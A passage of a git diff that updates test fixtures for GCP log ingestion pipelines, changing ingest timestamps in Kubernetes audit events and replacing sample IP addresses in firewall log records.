}",
 "id": "b10a904a-faa4-4e0d-9ec3-7bc6a180196a",
 "kind": "event",
@@ -781,7 +751,7 @@
 },
 "event": {
 "action": "io.k8s.get",
- "ingested": "2021-06-09T10:48:28.604110700Z",
+ "ingested": "2021-12-09T13:37:42.255799400Z",
 "original": "{\"insertId\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:public-info-viewer\\\" of ClusterRole \\\"system:public-info-viewer\\\" to Group \\\"system:unauthenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:anonymous\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"readyz\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"127.0.0.1\",\"callerSuppliedUserAgent\":\"kube-probe/1.19+\"},\"resourceName\":\"readyz\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:19:21.606980385Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:19:20.80581Z\"}",
 "id": "e973134d-b4d5-4e2f-92b8-82bba13fdb92",
 "kind": "event",
@@ -850,7 +820,7 @@
 },
 "event": {
 "action": "io.k8s.get",
- "ingested": "2021-06-09T10:48:28.604116200Z",
+ "ingested": "2021-12-09T13:37:42.255803700Z",
 "original": "{\"insertId\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:kube-system:generic-garbage-collector\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"api/v1\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"::1\",\"callerSuppliedUserAgent\":\"kube-controller-manager/v1.19.8 (linux/amd64) kubernetes/4f6f69f/system:serviceaccount:kube-system:generic-garbage-collector\"},\"resourceName\":\"api/v1\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:23:19.71757101Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:23:18.899153Z\"}",
 "id": "03adfb9f-71a3-4f41-9701-29b5542f4d22",
 "kind": "event",
diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log
index 0843196acc5..7b3ab77e457 100644
--- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log
+++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log
@@ -1,22 +1,22 @@ {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.128.0.16","dest_port":80,"protocol":6,"src_ip":"10.142.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"12345667","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} 
{"insertId":"1dobeotg13df9f7","jsonPayload":{"connection":{"dest_ip":"10.128.0.10","dest_port":57794,"protocol":6,"src_ip":"10.142.0.16","src_port":80},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"EGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"892378332","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} 
-{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
-{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-1
0-30T13:52:42.191988835Z"}
-{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"}
-{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} 
-{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"}
-{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr 
Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"}
-{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"}
-{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"}
-{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol 
Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"}
-{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"}
-{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 
-{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} 
-{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"}
-{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"}
-{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} 
-{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} 
-{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} 
-{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} 
-{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} 
+{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
+{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":
"2019-10-30T13:52:42.191988835Z"} +{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} 
+{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} 
